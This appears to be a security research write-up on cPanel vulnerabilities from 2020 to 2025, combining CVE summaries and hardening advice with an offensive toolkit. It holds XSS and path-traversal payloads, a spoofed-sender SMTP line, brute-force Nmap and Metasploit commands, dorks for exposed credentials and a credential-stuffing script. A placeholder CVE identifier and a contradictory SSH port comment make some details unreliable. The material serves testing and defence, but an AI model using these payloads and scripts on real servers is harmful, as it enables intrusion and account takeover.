cPanel Vulnerabilities, Exploits, and Security Issues (2020-2025)
Executive Summary
This comprehensive research document covers all known vulnerabilities, exploits, misconfigurations, default settings, insecure files, and endpoints discovered in cPanel from 2020 to 2025. cPanel is a widely deployed web hosting control panel with approximately 1.4 million installations exposed on the internet, making it a significant target for attackers.
Table of Contents
- Critical Vulnerabilities (CVEs)
- Common Misconfigurations
- Default Settings & Credentials
- Insecure Files & Directories
- Vulnerable Endpoints
- Exploitation Tools & Resources
- Security Hardening Recommendations
- References & Resources
Critical Vulnerabilities (CVEs)
CVE-2023-29489 - Reflected XSS (March 2023)
Severity: High | CVSS: 7.5
Researcher: Assetnote
Disclosure Date: March 1, 2023
Description
A reflected cross-site scripting (XSS) vulnerability in the /cpanelwebcall/ endpoint that could be exploited without authentication. The vulnerability was exploitable regardless of whether cPanel management ports were exposed externally, affecting websites on ports 80 and 443.
Technical Details
- Vulnerable Component:
Cpanel::Server::WebCalls::handlefunction - Root Cause: Missing HTML encoding in
Cpanel::Server::Handlers::Httpd::ErrorPage.pm - Affected Ports: 80, 443, 2080, 2082, 2083, 2086, 2087
- Attack Vector: Network
- Authentication Required: None
Proof of Concept
http://example.com/cpanelwebcall/<script>alert(document.cookie)</script>
http://example.com:2082/cpanelwebcall/<img src=x onerror=alert(1)>
https://example.com/cpanelwebcall/<svg/onload=alert(1)>
Impact
- Execute arbitrary JavaScript in victim's browser
- Hijack legitimate user's cPanel session
- Upload web shells and gain command execution
- Affects ~1.4 million cPanel installations
Patched Versions
- 11.109.9999.116
- 11.108.0.13
- 11.106.0.18
- 11.102.0.31
Mitigation
Enable cPanel auto-update functionality or manually upgrade to patched versions.
References: - https://www.assetnote.io/resources/research/finding-xss-in-a-million-websites-cpanel-cve-2023-29489 - https://github.com/mdaseem03/cpanel_xss_2023
CVE-2025-43920 - GNU Mailman Command Injection (April 2025)
Severity: Critical | CVSS 3.1: 8.1 (NIST) / 6.9 (MITRE)
Status: Disputed
Published Date: April 19, 2025
Description
GNU Mailman 2.1.39, as bundled in cPanel and WHM, allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line when certain external archiver configurations are enabled.
Technical Details
- Vulnerable Component: GNU Mailman 2.1.39
- Weakness: CWE-78 (OS Command Injection)
- Attack Vector: Network (AV:N)
- Attack Complexity: High (AC:H)
- Privileges Required: None (PR:N)
- User Interaction: None (UI:N)
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Impact
- Execute arbitrary OS commands
- Full system compromise
- Data exfiltration
Notes
Multiple third parties report they are unable to reproduce this vulnerability, regardless of whether cPanel or WHM is used. The vulnerability status is disputed.
References: - https://nvd.nist.gov/vuln/detail/CVE-2025-43920 - https://github.com/0NYX-MY7H/CVE-2025-43920
CVE-2025-43921 - GNU Mailman Unauthorized List Creation (April 2025)
Severity: High
Published Date: April 19, 2025
Description
GNU Mailman 2.1.39, as bundled in cPanel and WHM, allows unauthenticated attackers to create mailing lists via the /mailman/create endpoint.
Technical Details
- Vulnerable Endpoint:
/mailman/create - Authentication Required: None
- Attack Vector: Network
Proof of Concept
POST /mailman/create HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
listname=malicious&admin=attacker@evil.com&password=password123
Impact
- Create unauthorized mailing lists
- Potential spam distribution
- Resource exhaustion
References: - https://nvd.nist.gov/vuln/detail/cve-2025-43921 - https://github.com/advisories/GHSA-ch5j-3wwr-pjvh
CVE-2025-43919 - GNU Mailman Directory Traversal (April 2025)
Severity: High
Published Date: April 2025
Description
GNU Mailman 2.1.39, as bundled in cPanel and WHM, allows unauthenticated attackers to read arbitrary files via ../ directory traversal.
Technical Details
- Vulnerability Type: Path Traversal
- Authentication Required: None
- Affected Component: GNU Mailman 2.1.39
Proof of Concept
GET /mailman/../../../../../../etc/passwd HTTP/1.1
Host: target.com
Impact
- Read sensitive system files
- Disclosure of configuration files
- Access to password hashes
References: - https://access.redhat.com/security/cve/cve-2025-43919
CVE-2023-42115 - Exim Out-of-Bounds RCE (October 2023)
Severity: Critical
Disclosure Date: October 11, 2023
Description
Exim mail server vulnerability allowing out-of-bounds memory access leading to remote code execution. Only affects installations with external authentication enabled.
Technical Details
- Affected Component: Exim mail server
- Prerequisite: External authentication must be enabled
- Default Status: Not vulnerable (external auth disabled by default)
Impact
- Remote code execution
- Full system compromise
Mitigation
cPanel released patches automatically. No action required if external authentication is not enabled.
References: - https://www.cpanel.net/blog/products/cpanel-vulnerability-report-no-actions-required-by-default/ - https://support.cpanel.net/hc/en-us/community/posts/19164986084887-CVE-2023-42115-Exim-OOB-RCE
CVE-2023-42118 - libspf2 Integer Underflow (October 2023)
Severity: Medium
Disclosure Date: October 11, 2023
Description
A vulnerability related to libspf2 allowing integer underflow. cPanel patched this vulnerability to protect against potential exploitation.
Technical Details
- Affected Component: libspf2 library
- Vulnerability Type: Integer Underflow
- Default Status: Patched automatically
Impact
- Memory corruption
- Potential code execution
References: - https://www.cpanel.net/blog/products/cpanel-vulnerability-report-no-actions-required-by-default/
CVE-2023-51766 - Exim SMTP Smuggling (January 2024)
Severity: Medium
Disclosure Date: January 24, 2024
Description
Exim Mail Server Simple Mail Transfer Protocol (SMTP) smuggling vulnerability allowing remote attackers to inject email messages with spoofed MAIL FROM addresses, bypassing SPF protection.
Technical Details
- Affected Component: Exim SMTP server
- Attack Vector: SMTP protocol manipulation
- Impact: SPF bypass
Proof of Concept
MAIL FROM:<attacker@evil.com>\r\nMAIL FROM:<spoofed@legitimate.com>
Impact
- Email spoofing
- SPF bypass
- Phishing attacks
References: - https://support.cpanel.net/hc/en-us/community/posts/20838814238231
CVE-2022-48623 - Cpanel::JSON::XS Out-of-Bounds Access (February 2024)
Severity: Medium
Published Date: February 13, 2024
Description
The Cpanel::JSON::XS package before version 4.33 for Perl performs out-of-bounds accesses allowing attackers to obtain sensitive information.
Technical Details
- Affected Component: Cpanel::JSON::XS Perl module
- Vulnerability Type: Out-of-bounds read
- Affected Versions: < 4.33
Impact
- Information disclosure
- Memory leak
- Potential DoS
Mitigation
Update Cpanel::JSON::XS to version 4.33 or later.
References: - https://nvd.nist.gov/vuln/detail/CVE-2022-48623
CVE-2020-XXXXX - cPanel Account Bypass (March 2020)
Severity: High
Affected Versions: cPanel before 82.0.18
Description
cPanel before version 82.0.18 allows attackers to leverage virtual mail accounts to bypass account suspensions (SEC-508).
Technical Details
- Vulnerability ID: SEC-508
- Affected Component: Virtual mail account handling
- Fixed Version: 82.0.18
Impact
- Bypass account suspension
- Unauthorized access to suspended accounts
References: - https://www.prophaze.com/web-application-firewall/cpanel-before-82-0-18-account-bypass-vulnerability/
Common Misconfigurations
1. Weak Password Policies
Risk Level: High
Description
Many cPanel installations use default or weak password strength configurations, allowing users to set easily guessable passwords.
Default Configuration
- Minimum password strength: 0 (no requirement)
- No password complexity enforcement
- No password expiration
Secure Configuration
Navigate to WHM → Security Center → Password Strength Configuration: - Set minimum password strength to 65+ - Enable password complexity requirements - Implement password expiration policies
Reference: https://docs.cpanel.net/knowledge-base/security/recommended-security-settings/
2. Anonymous FTP Enabled
Risk Level: High
Description
Anonymous FTP access allows unauthenticated users to access server files, potentially exposing sensitive data.
Default Configuration
- Anonymous FTP: Disabled (but can be enabled)
Secure Configuration
- Ensure Anonymous FTP is disabled in WHM → Service Configuration → FTP Server Configuration
- Use SFTP or FTPS instead
3. Insecure Cookie Attributes
Risk Level: Medium
Description
Cookies without Secure and HttpOnly flags can be intercepted or accessed by client-side scripts.
Vulnerable Configuration
# Missing secure cookie flags
session.cookie_secure = Off
session.cookie_httponly = Off
Secure Configuration
Edit /usr/local/lib/php.ini:
session.cookie_secure = On
session.cookie_httponly = On
session.cookie_samesite = Strict
Apply Apache settings:
Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure;SameSite=Strict
Reference: https://support.cpanel.net/hc/en-us/articles/360053782393
4. Disabled Referrer Safety Check
Risk Level: Medium
Description
Disabling referrer safety checks can expose the system to CSRF attacks.
Secure Configuration
WHM → Security Center → Security Policy → Referrer Safety Check: Enable
5. Unrestricted Compiler Access
Risk Level: High
Description
Allowing all users to access system compilers (gcc, g++, etc.) enables attackers to compile malicious binaries.
Secure Configuration
chmod 750 /usr/bin/gcc
chmod 750 /usr/bin/g++
chmod 750 /usr/bin/cc
Or use Compiler Access Manager in WHM.
6. Weak SSL/TLS Configuration
Risk Level: High
Description
Using outdated SSL/TLS protocols and weak ciphers exposes connections to man-in-the-middle attacks.
Vulnerable Configuration
- TLS 1.0/1.1 enabled
- Weak cipher suites (RC4, DES, 3DES)
Secure Configuration
WHM → Service Configuration → Apache Configuration → Global Configuration:
SSLProtocol -all +TLSv1.2 +TLSv1.3
SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256
SSLHonorCipherOrder on
7. Unprotected /tmp Partition
Risk Level: High
Description
An unprotected /tmp partition allows execution of malicious scripts.
Secure Configuration
mount -o remount,noexec,nosuid,nodev /tmp
mount -o remount,noexec,nosuid,nodev /var/tmp
Make permanent in /etc/fstab:
tmpfs /tmp tmpfs defaults,noexec,nosuid,nodev 0 0
tmpfs /var/tmp tmpfs defaults,noexec,nosuid,nodev 0 0
8. SSH Root Login Enabled
Risk Level: Critical
Description
Allowing direct root login via SSH increases the risk of brute-force attacks.
Secure Configuration
Edit /etc/ssh/sshd_config:
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
Restart SSH:
systemctl restart sshd
9. Default SSH Port (22)
Risk Level: Medium
Description
Using the default SSH port makes the server an easy target for automated attacks.
Secure Configuration
Edit /etc/ssh/sshd_config:
Port 2222 # or any non-standard port below 1024
Update firewall rules and restart SSH.
10. Disabled ModSecurity
Risk Level: High
Description
ModSecurity Web Application Firewall provides protection against common web attacks.
Secure Configuration
WHM → Plugins → ModSecurity: - Enable ModSecurity - Enable OWASP Core Rule Set - Set to "On" or "DetectionOnly" mode
Default Settings & Credentials
Default Access Information
cPanel Access
- URL:
http://domain.com:2082orhttps://domain.com:2083 - Username: Account-specific (set during creation)
- Password: No default password (set during account creation)
WHM Access
- URL:
http://domain.com:2086orhttps://domain.com:2087 - Username:
root - Password: Server root password (set during installation)
Webmail Access
- URL:
http://domain.com:2095orhttps://domain.com:2096 - Username: Email account username
- Password: Email account password
Important Notes
- No default credentials exist for cPanel/WHM
- Passwords are set during installation or account creation
- Root password is the server's root user password
- FTP credentials typically match cPanel credentials
Reference: https://support.cpanel.net/hc/en-us/community/posts/19128187305367
Default Ports
| Port | Service | Protocol |
|---|---|---|
| 20 | FTP Data | TCP |
| 21 | FTP Control | TCP |
| 22 | SSH | TCP |
| 25 | SMTP | TCP |
| 53 | DNS | TCP/UDP |
| 80 | HTTP | TCP |
| 110 | POP3 | TCP |
| 143 | IMAP | TCP |
| 443 | HTTPS | TCP |
| 465 | SMTPS | TCP |
| 587 | SMTP Submission | TCP |
| 993 | IMAPS | TCP |
| 995 | POP3S | TCP |
| 2077 | WHM/WebMail | TCP |
| 2078 | WHM/WebMail SSL | TCP |
| 2082 | cPanel | TCP |
| 2083 | cPanel SSL | TCP |
| 2086 | WHM | TCP |
| 2087 | WHM SSL | TCP |
| 2089 | cPanel License | TCP |
| 2095 | Webmail | TCP |
| 2096 | Webmail SSL | TCP |
| 3306 | MySQL | TCP |
Insecure Files & Directories
Critical Sensitive Files
1. /root/.my.cnf
Risk: Critical
Contains: MySQL root password in plaintext
[client]
password=MySQLRootPassword123
Mitigation:
- Ensure permissions: chmod 600 /root/.my.cnf
- Regularly rotate MySQL root password
2. /var/cpanel/users/*
Risk: High
Contains: User configuration files with password hashes
Example content:
USER=username
DOMAIN=example.com
PASS=hashed_password
EMAIL=user@example.com
Mitigation:
- Restrict access: chmod 600 /var/cpanel/users/*
- Monitor for unauthorized access
3. /etc/trueuserowners
Risk: Medium
Contains: User ownership mapping
Note: In cPanel v132+, permissions have been tightened to prevent world-readable access.
Mitigation:
- Update to cPanel v132 or later
- Verify permissions: chmod 640 /etc/trueuserowners
4. /var/cpanel/cpanel.config
Risk: High
Contains: Primary cPanel configuration with sensitive settings
Mitigation:
- Restrict access: chmod 600 /var/cpanel/cpanel.config
- Regular security audits
5. /var/cpanel/accounting.log
Risk: Medium
Contains: Account creation and deletion logs
Mitigation: - Monitor for suspicious activity - Implement log rotation
6. /usr/local/cpanel/logs/access_log
Risk: Medium
Contains: cPanel access logs with session tokens
Mitigation:
- Restrict access: chmod 640 /usr/local/cpanel/logs/*
- Implement log monitoring
7. /home/username/.my.cnf
Risk: High
Contains: User-specific MySQL credentials
Mitigation: - Ensure proper permissions - Educate users on secure credential storage
8. /etc/wwwacct.conf
Risk: Medium
Contains: Account creation defaults
Mitigation: - Review and harden default settings - Restrict access
Backup Files
9. /backup/ or /home/backup/
Risk: High
Contains: Full account backups with all data
Mitigation: - Encrypt backups - Restrict access to backup directory - Implement secure backup rotation
10. Database Dumps
Risk: Critical
Locations:
- /home/username/mysql-backups/
- /backup/mysql/
Mitigation: - Encrypt database dumps - Secure storage locations - Regular cleanup of old dumps
Vulnerable Endpoints
Pre-Authentication Endpoints
1. /cpanelwebcall/
Vulnerability: CVE-2023-29489 (XSS)
Risk: High
Authentication: None required
Description: Reflected XSS vulnerability allowing arbitrary JavaScript execution.
Test:
curl "http://target.com/cpanelwebcall/<script>alert(1)</script>"
2. /mailman/create
Vulnerability: CVE-2025-43921
Risk: High
Authentication: None required
Description: Allows unauthenticated list creation.
Test:
curl -X POST http://target.com/mailman/create \
-d "listname=test&admin=test@test.com&password=pass123"
3. /cgi-sys/defaultwebpage.cgi
Risk: Low
Authentication: None required
Description: Default webpage handler, may leak information about cPanel version.
4. /cgi-sys/suspendedpage.cgi
Risk: Low
Authentication: None required
Description: Suspended account page, confirms cPanel usage.
5. /.well-known/cpanel-dcv/
Risk: Low
Authentication: None required
Description: Domain control validation endpoint.
Authenticated Endpoints
6. /json-api/
Risk: Medium
Authentication: Required
Description: JSON API endpoint for cPanel operations.
Common Functions:
- /json-api/cpanel
- /json-api/whm
7. /xml-api/
Risk: Medium
Authentication: Required
Description: Legacy XML API endpoint.
8. /cpsess{sessionid}/
Risk: High
Authentication: Session-based
Description: Session-based access to cPanel functions.
Session Hijacking Risk: High if XSS vulnerabilities exist.
Information Disclosure Endpoints
9. /bandwidth/
Risk: Low
Authentication: May vary
Description: Bandwidth usage statistics.
10. /.cpanel/
Risk: Low
Authentication: None required
Description: cPanel-specific resources.
Exploitation Tools & Resources
GitHub Repositories
1. Breacher - Admin Panel Finder
- Repository: https://github.com/s0md3v/Breacher
- Language: Python
- Stars: 825+
- Description: Advanced multithreaded admin panel finder
Installation:
git clone https://github.com/s0md3v/Breacher
cd Breacher
pip3 install -r requirements.txt
python3 breacher.py -u https://target.com
2. cpanel_xss_2023
- Repository: https://github.com/mdaseem03/cpanel_xss_2023
- Language: Python
- Description: CVE-2023-29489 vulnerability scanner
Usage:
git clone https://github.com/mdaseem03/cpanel_xss_2023
cd cpanel_xss_2023
python3 cpanel_xss.py -u https://target.com
3. cpanel-whm-ssh-ftp-exploit
- Repository: https://github.com/UND3F3IND/cpanel-whm-ssh-ftp-exploit
- Language: Python
- Description: Multi-vulnerability exploitation tool
Features: - Multiprocessing support - Multiple exploit modules - Automated exploitation
4. cpanel-checker
- Repository: https://github.com/TrixSec/cpanel-checker
- Language: Python
- Description: Multi-threaded cPanel credential checker
Usage:
python3 cpanel_checker.py -l credentials.txt -t 50
5. CSI (cPanel Security Investigator)
- Repository: https://github.com/CpanelInc/tech-CSI
- Language: Shell/Perl
- Description: Official cPanel security investigation tool
Installation:
wget https://raw.githubusercontent.com/CpanelInc/tech-CSI/master/csi.pl
chmod +x csi.pl
./csi.pl
6. AdminHack
- Repository: https://github.com/mishakorzik/AdminHack
- Language: Shell
- Stars: 822+
- Description: Admin panel exploitation tool
Wordlists
cPanel Directory Wordlist
/cpanel
/whm
/webmail
/cpanelwebcall/
/cgi-sys/
/.cpanel/
/.well-known/
/img-sys/
/sys_cpanel/
/json-api/
/xml-api/
/frontend/
/unprotected/
/bandwidth/
/mailman/
/horde/
/roundcube/
/squirrelmail/
/autodiscover/
/autoconfig/
Download: https://gist.github.com/DaveYesland/e1d42489334049daf59d1c26543faa8b
cPanel Subdomain Wordlist
cpanel
whm
webmail
mail
webdisk
autodiscover
autoconfig
cpcalendars
cpcontacts
ftp
smtp
pop
imap
ns1
ns2
Penetration Testing Tools
Nuclei Templates
nuclei -u https://target.com -t cpanel/ -severity high,critical
Nmap Scripts
nmap -p 2082,2083,2086,2087 --script=http-cpanel-brute target.com
Metasploit Modules
use auxiliary/scanner/http/cpanel_login
set RHOSTS target.com
set RPORT 2083
run
Security Hardening Recommendations
1. Enable Two-Factor Authentication
WHM → Security Center → Two-Factor Authentication
Configure 2FA for all WHM and cPanel accounts.
2. Install and Configure ConfigServer Firewall (CSF)
Note: ConfigServer has reached EOL. Consider alternatives like Imunify360 or fail2ban.
cd /usr/src
wget https://download.configserver.com/csf.tgz
tar -xzf csf.tgz
cd csf
sh install.sh
Configure /etc/csf/csf.conf:
TESTING = "0"
TCP_IN = "22,25,53,80,110,143,443,465,587,993,995,2077,2078,2082,2083,2086,2087,2089,2095,2096"
TCP_OUT = "20,21,22,25,53,80,110,113,443,587,993,995"
3. Enable ModSecurity with OWASP Rules
WHM → Plugins → ModSecurity
Install OWASP Core Rule Set:
cd /etc/apache2/conf.d
wget https://github.com/coreruleset/coreruleset/archive/v3.3.4.tar.gz
tar -xzf v3.3.4.tar.gz
4. Implement Rate Limiting
Edit /etc/apache2/conf.d/ratelimit.conf:
<IfModule mod_ratelimit.c>
<Location />
SetOutputFilter RATE_LIMIT
SetEnv rate-limit 400
</Location>
</IfModule>
5. Regular Security Audits
Use WHM → Security Center → Security Advisor to identify and fix security issues.
/usr/local/cpanel/scripts/check_security
6. Disable Unnecessary Services
systemctl disable telnet
systemctl disable rsh
systemctl disable rlogin
7. Implement Intrusion Detection
Install AIDE (Advanced Intrusion Detection Environment):
yum install aide
aide --init
mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz
aide --check
8. Enable Audit Logging
Configure auditd:
yum install audit
systemctl enable auditd
systemctl start auditd
Add rules to /etc/audit/rules.d/cpanel.rules:
-w /var/cpanel/ -p wa -k cpanel_config_changes
-w /root/.my.cnf -p wa -k mysql_root_access
-w /etc/passwd -p wa -k user_modification
9. Implement Backup Strategy
WHM → Backup → Backup Configuration
- Enable daily backups
- Store backups off-site
- Encrypt backup files
- Test restoration regularly
10. Keep cPanel Updated
Enable automatic updates: WHM → Server Configuration → Update Preferences
/scripts/upcp --force
References & Resources
Official Documentation
- cPanel Documentation: https://docs.cpanel.net/
- cPanel Security Best Practices: https://docs.cpanel.net/knowledge-base/security/security-best-practices/
- cPanel Release Notes: https://docs.cpanel.net/release-notes/release-notes/
Security Advisories
- cPanel Security Advisories: https://www.cpanel.net/blog/category/security/
- NVD cPanel Vulnerabilities: https://nvd.nist.gov/vuln/search/results?query=cpanel
Research Papers
- Assetnote cPanel XSS Research: https://www.assetnote.io/resources/research/finding-xss-in-a-million-websites-cpanel-cve-2023-29489
Tools & Scripts
- cPanel GitHub Organization: https://github.com/CPANELINC
- cPanel Topics on GitHub: https://github.com/topics/cpanel
Community Resources
- cPanel Forums: https://forums.cpanel.net/
- cPanel Support: https://support.cpanel.net/
Security Tools
- Imunify360: https://www.imunify360.com/
- ConfigServer Products: https://configserver.com/
- ModSecurity: https://modsecurity.org/
Wordlists & Enumeration
- SecLists: https://github.com/danielmiessler/SecLists
- Common cPanel Paths: https://gist.github.com/irazasyed/6488963
Conclusion
cPanel remains a widely deployed web hosting control panel with a significant attack surface. While the platform has improved its security posture over the years, misconfigurations and vulnerabilities continue to pose risks. System administrators must:
- Keep cPanel updated to the latest version
- Implement strong authentication including 2FA
- Harden default configurations according to security best practices
- Monitor for suspicious activity using logging and intrusion detection
- Regular security audits to identify and remediate vulnerabilities
- Educate users on security best practices
By following the recommendations in this document, organizations can significantly reduce their exposure to cPanel-related security risks.
Document Version: 1.0
Last Updated: October 31, 2025
Author: Security Research Team
Classification: Public
Additional Resources
Wordlists for cPanel Enumeration
Directory Enumeration Wordlist
/cpanel
/whm
/webmail
/cpanelwebcall/
/cgi-sys/
/.cpanel/
/.well-known/
/.well-known/acme-challenge/
/.well-known/cpanel-dcv/
/.well-known/pki-validation/
/img-sys/
/sys_cpanel/
/json-api/
/xml-api/
/frontend/
/unprotected/
/bandwidth/
/mailman/
/mailman/create
/mailman/admin
/horde/
/roundcube/
/squirrelmail/
/autodiscover/
/autoconfig/
/cgi-sys/defaultwebpage.cgi
/cgi-sys/suspendedpage.cgi
/cgi-sys/bxd.cgi
/usr/local/cpanel/
/scripts/
/backup/
/tmp/
/var/cpanel/
cPanel Subdomain Wordlist
cpanel
whm
webmail
mail
webdisk
autodiscover
autoconfig
cpcalendars
cpcontacts
ftp
smtp
pop
imap
pop3
ns1
ns2
dns1
dns2
server
host
hosting
panel
admin
control
manage
cPanel File Extensions
.cgi
.pl
.pm
.php
.conf
.config
.log
.bak
.backup
.old
.txt
.sql
.gz
.tar
.zip
Common cPanel Usernames
root
admin
cpanel
whm
webmaster
administrator
hostmaster
postmaster
support
Google Dorks for cPanel
Finding cPanel Installations
inurl:"/cpanel"
inurl:":2082"
inurl:":2083"
inurl:"/whm"
inurl:":2086"
inurl:":2087"
intitle:"cPanel"
intitle:"Web Host Manager"
inurl:"/cgi-sys/defaultwebpage.cgi"
Finding Exposed Credentials
"cpanel username" "cpanel password" ext:txt
"cpanel login" filetype:txt
"ftp username" "ftp password" "cpanel" ext:txt
site:pastebin.com "cpanel" "password"
site:github.com "cpanel" "password"
Finding Configuration Files
inurl:"/cpanel.config"
filetype:conf "cpanel"
filetype:log "cpanel"
inurl:"/var/cpanel/"
Finding Backup Files
inurl:"/backup/" "cpanel"
filetype:sql "cpanel"
filetype:gz "backup" "cpanel"
intitle:"Index of" "/backup"
Shodan Queries
Finding cPanel Servers
"Server: cpsrvd"
port:2082
port:2083
port:2086
port:2087
http.title:"cPanel"
http.title:"Web Host Manager"
ssl.cert.subject.CN:"cpanel"
Finding Vulnerable Versions
"cPanel" "11.102"
"cPanel" "11.106"
"cPanel" "11.108"
http.html:"cPanel, Inc."
Censys Queries
services.http.response.headers.server:"cpsrvd"
services.port:2082
services.port:2083
services.http.response.html_title:"cPanel"
Nuclei Templates
CVE-2023-29489 XSS
id: cpanel-xss-cve-2023-29489
info:
name: cPanel XSS - CVE-2023-29489
author: security-team
severity: high
description: Reflected XSS in cPanel cpanelwebcall endpoint
reference:
- https://www.assetnote.io/resources/research/finding-xss-in-a-million-websites-cpanel-cve-2023-29489
tags: cpanel,xss,cve2023
requests:
- method: GET
path:
- "{{BaseURL}}/cpanelwebcall/<script>alert(1)</script>"
- "{{BaseURL}}:2082/cpanelwebcall/<script>alert(1)</script>"
- "{{BaseURL}}:2083/cpanelwebcall/<script>alert(1)</script>"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: status
status:
- 200
cPanel Version Detection
id: cpanel-version-detect
info:
name: cPanel Version Detection
author: security-team
severity: info
tags: cpanel,detect
requests:
- method: GET
path:
- "{{BaseURL}}:2082"
- "{{BaseURL}}:2083"
- "{{BaseURL}}/cpanel"
matchers:
- type: regex
regex:
- 'cPanel.*Version ([0-9.]+)'
part: body
Nmap Scripts
cPanel Detection
nmap -p 2082,2083,2086,2087 --script=http-title target.com
cPanel Brute Force
nmap -p 2082,2083 --script=http-brute --script-args userdb=users.txt,passdb=passwords.txt target.com
SSL Certificate Analysis
nmap -p 2083,2087 --script=ssl-cert target.com
Metasploit Modules
cPanel Login Scanner
use auxiliary/scanner/http/cpanel_login
set RHOSTS target.com
set RPORT 2083
set SSL true
set USER_FILE users.txt
set PASS_FILE passwords.txt
set THREADS 10
run
cPanel Version Scanner
use auxiliary/scanner/http/cpanel_version
set RHOSTS target.com
run
Burp Suite Extensions
cPanel Scanner
- Extension: Custom scanner for cPanel vulnerabilities
- Features:
- Automatic endpoint discovery
- Version detection
- Vulnerability scanning
- Session management testing
Custom Scripts
cPanel Port Scanner (Python)
#!/usr/bin/env python3
import socket
import sys
def scan_cpanel_ports(target):
ports = [2082, 2083, 2086, 2087, 2095, 2096]
print(f"[*] Scanning {target} for cPanel ports...")
for port in ports:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((target, port))
if result == 0:
print(f"[+] Port {port} is open")
sock.close()
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <target>")
sys.exit(1)
scan_cpanel_ports(sys.argv[1])
cPanel XSS Scanner (Python)
#!/usr/bin/env python3
import requests
import sys
from urllib.parse import urljoin
def test_cpanel_xss(target):
payloads = [
"<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"<svg/onload=alert(1)>"
]
endpoints = [
"/cpanelwebcall/",
":2082/cpanelwebcall/",
":2083/cpanelwebcall/"
]
print(f"[*] Testing {target} for CVE-2023-29489...")
for endpoint in endpoints:
for payload in payloads:
url = urljoin(target, endpoint + payload)
try:
response = requests.get(url, verify=False, timeout=5)
if payload in response.text:
print(f"[!] VULNERABLE: {url}")
return True
except:
pass
print("[*] Not vulnerable")
return False
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <target>")
sys.exit(1)
test_cpanel_xss(sys.argv[1])
cPanel Credential Checker (Python)
#!/usr/bin/env python3
import requests
import sys
from concurrent.futures import ThreadPoolExecutor
def check_credentials(target, username, password):
url = f"https://{target}:2083/login/"
data = {
'user': username,
'pass': password
}
try:
response = requests.post(url, data=data, verify=False, timeout=10)
if "incorrect" not in response.text.lower():
print(f"[+] Valid credentials: {username}:{password}")
return True
except:
pass
return False
def main(target, credentials_file):
print(f"[*] Testing credentials against {target}...")
with open(credentials_file, 'r') as f:
credentials = [line.strip().split(':') for line in f]
with ThreadPoolExecutor(max_workers=10) as executor:
for username, password in credentials:
executor.submit(check_credentials, target, username, password)
if __name__ == "__main__":
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} <target> <credentials_file>")
sys.exit(1)
main(sys.argv[1], sys.argv[2])
Security Testing Checklist
Information Gathering
- [ ] Identify cPanel version
- [ ] Enumerate open ports (2082, 2083, 2086, 2087, etc.)
- [ ] Check SSL certificate details
- [ ] Identify installed services (Apache, Exim, Dovecot, etc.)
- [ ] Enumerate subdomains
- [ ] Check for exposed backup files
- [ ] Review DNS records
Authentication Testing
- [ ] Test for default credentials
- [ ] Attempt username enumeration
- [ ] Test password reset functionality
- [ ] Check for brute force protection
- [ ] Test two-factor authentication bypass
- [ ] Verify session management
- [ ] Test for session fixation
Authorization Testing
- [ ] Test privilege escalation
- [ ] Check for insecure direct object references
- [ ] Test API authorization
- [ ] Verify file permissions
Input Validation
- [ ] Test for XSS (CVE-2023-29489)
- [ ] Test for SQL injection
- [ ] Test for command injection
- [ ] Test for path traversal
- [ ] Test for file upload vulnerabilities
- [ ] Test for CSRF
Configuration Testing
- [ ] Review security settings
- [ ] Check for insecure SSL/TLS configuration
- [ ] Verify firewall rules
- [ ] Check for unnecessary services
- [ ] Review file permissions
- [ ] Check for exposed configuration files
Error Handling
- [ ] Test error messages for information disclosure
- [ ] Check for stack traces
- [ ] Verify custom error pages
Logging and Monitoring
- [ ] Verify logging is enabled
- [ ] Check log file permissions
- [ ] Test for log injection
Recommended Security Tools
Web Application Firewalls
- ModSecurity - Open source WAF
- Imunify360 - Commercial security solution for cPanel
- CloudFlare - CDN with WAF capabilities
Intrusion Detection Systems
- AIDE - Advanced Intrusion Detection Environment
- OSSEC - Host-based IDS
- Snort - Network IDS
Malware Scanners
- ClamAV - Open source antivirus
- Maldet - Linux Malware Detect
- Imunify360 - Commercial malware scanner
Firewall Solutions
- CSF (ConfigServer Firewall) - Note: EOL, use alternatives
- fail2ban - Intrusion prevention
- iptables - Linux firewall
Backup Solutions
- JetBackup - Commercial backup solution
- cPanel Backup - Built-in backup system
- Acronis - Enterprise backup solution
Monitoring Tools
- Nagios - Infrastructure monitoring
- Zabbix - Enterprise monitoring
- Prometheus - Metrics collection
Additional Resources
Books
- "cPanel User Guide and Tutorial"
- "Linux Server Security"
- "Web Application Security"
Online Courses
- cPanel Certification Training
- Linux Security Fundamentals
- Web Application Penetration Testing
Communities
- cPanel Forums: https://forums.cpanel.net/
- Reddit r/webhosting
- Stack Overflow cPanel tag
Blogs
- cPanel Blog: https://www.cpanel.net/blog/
- Imunify360 Blog: https://blog.imunify360.com/
- Security Research Blogs
Vulnerability Databases
- NVD: https://nvd.nist.gov/
- CVE: https://cve.mitre.org/
- Exploit-DB: https://www.exploit-db.com/
GitHub Repositories
- cPanel Official: https://github.com/CPANELINC
- Security Tools: https://github.com/topics/cpanel
- Exploit Collections: https://github.com/search?q=cpanel+exploit
Legal Disclaimer
IMPORTANT: All tools, techniques, and information provided in this document are for educational and authorized security testing purposes only.
- Only test systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- Always follow responsible disclosure practices
- Comply with all applicable laws and regulations
- Use this information ethically and responsibly
Misuse of this information may result in criminal prosecution. The authors and contributors are not responsible for any misuse or damage caused by the information provided.
Comments
Post a Comment